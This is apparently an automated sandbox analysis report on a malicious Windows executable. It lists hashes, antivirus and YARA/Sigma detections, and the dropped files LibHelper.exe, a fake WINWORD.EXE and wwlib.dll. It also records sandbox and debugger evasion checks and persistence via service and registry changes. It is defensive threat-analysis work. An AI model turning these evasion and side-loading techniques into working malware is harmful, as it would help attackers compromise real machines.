Play interactive tour

Edit tour

Analysis Report 9nZ3r5ZN45

Overview

General Information

Sample Name:	9nZ3r5ZN45 (renamed file extension from none to exe)
Analysis ID:	377823
MD5:	910fe72c4f1bd5a451561f732d94a8b8
SHA1:	a93ebdd16c5862b178d6e5c58d3e074df772a021
SHA256:	6beb4a5bcbdaf33f697eea6a4f7f2e9704cc88c20c265d0ce42287d930d06345
Infos:
Most interesting Screenshot:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Contains functionality to detect sleep reduction / modifications

Drops executables to the windows directory (C:\Windows) and starts them

Injects files into Windows application

Sigma detected: Executables Started in Suspicious Folder

Antivirus or Machine Learning detection for unpacked file

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

File is packed with WinRar

Found potential string decryption / allocating functions

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Starts Microsoft Word (often done to prevent that the user detects that something wrong)

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

9nZ3r5ZN45.exe (PID: 6004 cmdline: 'C:\Users\user\Desktop\9nZ3r5ZN45.exe' MD5: 910FE72C4F1BD5A451561F732D94A8B8)

LibHelper.exe (PID: 6076 cmdline: 'C:\Windows\Help\Windows\LibHelper.exe' MD5: 813B19969C3B67C6BB1369433142021A)

WINWORD.EXE (PID: 5572 cmdline: 'C:\Windows\Help\Windows\WINWORD.EXE' MD5: 15E52F52ED2B8ED122FAE897119687C4)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\Help\Windows\wwlib.dll	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x53890:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0

Sigma Overview

System Summary:

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Help\Windows\LibHelper.exe' , CommandLine: 'C:\Windows\Help\Windows\LibHelper.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Help\Windows\LibHelper.exe, NewProcessName: C:\Windows\Help\Windows\LibHelper.exe, OriginalFileName: C:\Windows\Help\Windows\LibHelper.exe, ParentCommandLine: 'C:\Users\user\Desktop\9nZ3r5ZN45.exe' , ParentImage: C:\Users\user\Desktop\9nZ3r5ZN45.exe, ParentProcessId: 6004, ProcessCommandLine: 'C:\Windows\Help\Windows\LibHelper.exe' , ProcessId: 6076

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Windows\Help\Windows\wwlib.dll

Avira: detection malicious, Label: TR/Crypt.XPACK.Gen2

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Windows\Help\Windows\LibHelper.exe	ReversingLabs: Detection: 16%
Source: C:\Windows\Help\Windows\wwlib.dll	ReversingLabs: Detection: 16%

Multi AV Scanner detection for submitted file

Show sources

Source: 9nZ3r5ZN45.exe	Virustotal: Detection: 50%			Perma Link
Source: 9nZ3r5ZN45.exe	ReversingLabs: Detection: 25%

Source: 2.2.WINWORD.EXE.6d860000.3.unpack

Avira: Label: TR/Crypt.XPACK.Gen2

Source: 9nZ3r5ZN45.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Windows\Help\Windows\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9415_none_508df7e2bcbccb90\MSVCR90.dll

Jump to behavior

Source: 9nZ3r5ZN45.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 9nZ3r5ZN45.exe
Source:	Binary string: t:\word\x86\ship\0\winword.pdb6\ship\0\winword.exe\bbtopt\winwordO.pdb source: WINWORD.EXE, 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, WINWORD.EXE.0.dr
Source:	Binary string: 6\ship\0\winword.exe\bbtopt\winwordO.pdb source: WINWORD.EXE, WINWORD.EXE.0.dr
Source:	Binary string: t:\word\x86\ship\0\winword.pdb source: WINWORD.EXE, WINWORD.EXE.0.dr

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0083A383 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0083A383
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0084B014 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0084B014
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0085A02E FindFirstFileExA,	0_2_0085A02E
Source: C:\Windows\Help\Windows\LibHelper.exe	Code function: 1_2_01075746 FindFirstFileExW,	1_2_01075746
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_6D868875 FindFirstFileExW,	2_2_6D868875
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_03039CCD FindFirstFileExW,	2_2_03039CCD

Source: WINWORD.EXE, 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp

String found in binary or memory: http://%s%08x.txtc:

Source: WINWORD.EXE, 00000002.00000002.462222699.000000000164A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

Code function: 0_2_008370B9: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_008370B9

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

File created: C:\Windows\Help\Windows\__tmp_rar_sfx_access_check_5689109

Jump to behavior

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

File deleted: C:\Windows\Help\Windows\__tmp_rar_sfx_access_check_5689109

Jump to behavior

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_008462E0	0_2_008462E0
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_00838458	0_2_00838458
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0085C100	0_2_0085C100
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_00850113	0_2_00850113
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0083320E	0_2_0083320E
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0084F3CA	0_2_0084F3CA
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_00843446	0_2_00843446
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0085C5AE	0_2_0085C5AE
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0083F5FB	0_2_0083F5FB
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0083E546	0_2_0083E546
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_00850548	0_2_00850548
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_008606A4	0_2_008606A4
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_008436C1	0_2_008436C1
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_00846715	0_2_00846715
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0083277D	0_2_0083277D
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0084F8C6	0_2_0084F8C6
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0083E9A9	0_2_0083E9A9
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_008439F2	0_2_008439F2
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_00845911	0_2_00845911
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0083DB11	0_2_0083DB11
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0083BB6E	0_2_0083BB6E
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0084FCDE	0_2_0084FCDE
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_00853D1A	0_2_00853D1A
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_00846D4E	0_2_00846D4E
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_00835EAB	0_2_00835EAB
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_00833FBD	0_2_00833FBD
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0083DF48	0_2_0083DF48
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_00853F49	0_2_00853F49
Source: C:\Windows\Help\Windows\LibHelper.exe	Code function: 1_2_0107B4DD	1_2_0107B4DD
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_6D86E601	2_2_6D86E601
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_03058BD0	2_2_03058BD0
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_0303F81C	2_2_0303F81C
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_0303C0D0	2_2_0303C0D0
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_0306F631	2_2_0306F631
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_0303F6FC	2_2_0303F6FC
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_0303C568	2_2_0303C568
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_030415A0	2_2_030415A0
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_03031406	2_2_03031406
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_030354BB	2_2_030354BB

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: String function: 0084E2F0 appears 31 times
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: String function: 0084D8C4 appears 38 times
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: String function: 0084D9C0 appears 51 times

Source: 9nZ3r5ZN45.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9nZ3r5ZN45.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WINWORD.EXE.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LibHelper.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LibHelper.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LibHelper.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LibHelper.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 9nZ3r5ZN45.exe, 00000000.00000003.198404389.0000000000666000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamewlib.dll2 vs 9nZ3r5ZN45.exe
Source: 9nZ3r5ZN45.exe, 00000000.00000002.203395406.0000000004AF0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs 9nZ3r5ZN45.exe
Source: 9nZ3r5ZN45.exe, 00000000.00000002.203395406.0000000004AF0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 9nZ3r5ZN45.exe
Source: 9nZ3r5ZN45.exe, 00000000.00000002.203238414.00000000049F0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs 9nZ3r5ZN45.exe
Source: 9nZ3r5ZN45.exe, 00000000.00000002.202920472.00000000026C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs 9nZ3r5ZN45.exe

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Section loaded: dxgidebug.dll	Jump to behavior

Source: 9nZ3r5ZN45.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Windows\Help\Windows\wwlib.dll, type: DROPPED

Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-03-09

Source: classification engine

Classification label: mal80.evad.winEXE@5/3@0/0

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

Code function: 0_2_00836E20 GetLastError,FormatMessageW,

0_2_00836E20

Source: C:\Windows\Help\Windows\WINWORD.EXE

Code function: RegOpenKeyExA,RegGetValueA,RegSetValueExA,OpenSCManagerA,GetLastError,CloseHandle,FindCloseChangeNotification,CloseHandle,CreateServiceA,ChangeServiceConfig2A,RegOpenKeyExA,RegCreateKeyA,RegSetValueExA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

2_2_0303107D

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

Code function: 0_2_008496AD FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_008496AD

Source: C:\Windows\Help\Windows\WINWORD.EXE

Code function: 2_2_0303107D RegOpenKeyExA,RegGetValueA,RegSetValueExA,OpenSCManagerA,GetLastError,CloseHandle,FindCloseChangeNotification,CloseHandle,CreateServiceA,ChangeServiceConfig2A,RegOpenKeyExA,RegCreateKeyA,RegSetValueExA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

2_2_0303107D

Source: C:\Windows\Help\Windows\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\edgDDEA.tmp

Jump to behavior

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Command line argument: sfxname	0_2_0084CC0E
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Command line argument: sfxstime	0_2_0084CC0E
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Command line argument: STARTDLG	0_2_0084CC0E
Source: C:\Windows\Help\Windows\LibHelper.exe	Command line argument: PcHelper	1_2_010710A0
Source: C:\Windows\Help\Windows\LibHelper.exe	Command line argument: PCHELPER	1_2_010710A0
Source: C:\Windows\Help\Windows\LibHelper.exe	Command line argument: @Cw	1_2_010710A0
Source: C:\Windows\Help\Windows\LibHelper.exe	Command line argument: PCHELPER	1_2_010710A0
Source: C:\Windows\Help\Windows\LibHelper.exe	Command line argument: PcHelper	1_2_010710A0
Source: C:\Windows\Help\Windows\LibHelper.exe	Command line argument: PCHELPER	1_2_010710A0
Source: C:\Windows\Help\Windows\WINWORD.EXE	Command line argument: wwlib.dll	2_2_2FF1159F
Source: C:\Windows\Help\Windows\WINWORD.EXE	Command line argument: FMain	2_2_2FF1159F

Source: 9nZ3r5ZN45.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 9nZ3r5ZN45.exe	Virustotal: Detection: 50%
Source: 9nZ3r5ZN45.exe	ReversingLabs: Detection: 25%

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

File read: C:\Users\user\Desktop\9nZ3r5ZN45.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\9nZ3r5ZN45.exe 'C:\Users\user\Desktop\9nZ3r5ZN45.exe'
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Process created: C:\Windows\Help\Windows\LibHelper.exe 'C:\Windows\Help\Windows\LibHelper.exe'
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Process created: C:\Windows\Help\Windows\WINWORD.EXE 'C:\Windows\Help\Windows\WINWORD.EXE'
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Process created: C:\Windows\Help\Windows\LibHelper.exe 'C:\Windows\Help\Windows\LibHelper.exe'	Jump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Process created: C:\Windows\Help\Windows\WINWORD.EXE 'C:\Windows\Help\Windows\WINWORD.EXE'	Jump to behavior

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Windows\Help\Windows\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9415_none_508df7e2bcbccb90\MSVCR90.dll

Jump to behavior

Source: 9nZ3r5ZN45.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 9nZ3r5ZN45.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 9nZ3r5ZN45.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 9nZ3r5ZN45.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 9nZ3r5ZN45.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 9nZ3r5ZN45.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 9nZ3r5ZN45.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: 9nZ3r5ZN45.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 9nZ3r5ZN45.exe
Source:	Binary string: t:\word\x86\ship\0\winword.pdb6\ship\0\winword.exe\bbtopt\winwordO.pdb source: WINWORD.EXE, 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, WINWORD.EXE.0.dr
Source:	Binary string: 6\ship\0\winword.exe\bbtopt\winwordO.pdb source: WINWORD.EXE, WINWORD.EXE.0.dr
Source:	Binary string: t:\word\x86\ship\0\winword.pdb source: WINWORD.EXE, WINWORD.EXE.0.dr

Source: 9nZ3r5ZN45.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 9nZ3r5ZN45.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 9nZ3r5ZN45.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 9nZ3r5ZN45.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 9nZ3r5ZN45.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

File created: C:\Windows\Help\Windows\__tmp_rar_sfx_access_check_5689109

Jump to behavior

Source: wwlib.dll.0.dr	Static PE information: section name: .detourc
Source: wwlib.dll.0.dr	Static PE information: section name: .detourd

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0084E336 push ecx; ret	0_2_0084E349
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Code function: 0_2_0084D8C4 push eax; ret	0_2_0084D8E2
Source: C:\Windows\Help\Windows\LibHelper.exe	Code function: 1_2_01071F24 push ecx; ret	1_2_01071F36
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_2FF1153C push ecx; ret	2_2_2FF1154F
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_6D864F04 push ecx; ret	2_2_6D864F16
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_0305931B push ecx; ret	2_2_03059319
Source: C:\Windows\Help\Windows\WINWORD.EXE	Code function: 2_2_03032E74 push ecx; ret	2_2_03032E86

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Executable created and started: C:\Windows\Help\Windows\LibHelper.exe			Jump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Executable created and started: C:\Windows\Help\Windows\WINWORD.EXE			Jump to behavior

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	File created: C:\Windows\Help\Windows\wwlib.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	File created: C:\Windows\Help\Windows\LibHelper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	File created: C:\Windows\Help\Windows\WINWORD.EXE	Jump to dropped file

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	File created: C:\Windows\Help\Windows\wwlib.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	File created: C:\Windows\Help\Windows\LibHelper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	File created: C:\Windows\Help\Windows\WINWORD.EXE	Jump to dropped file

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Process created: C:\Windows\Help\Windows\WINWORD.EXE
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Process created: C:\Windows\Help\Windows\WINWORD.EXE			Jump to behavior

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Help\Windows\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Windows\Help\Windows\WINWORD.EXE

Code function: 2_2_6D861351

2_2_6D861351

Source: C:\Users\user\Desktop\9nZ3r5ZN45.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\Help\Windows\WINWORD.EXE

Code function: 2_2_03062842 rdtsc

2_2_03062842

Source: C:\Windows\Help\Windows\WINWORD.EXE

Code function: 2_2_6D861351

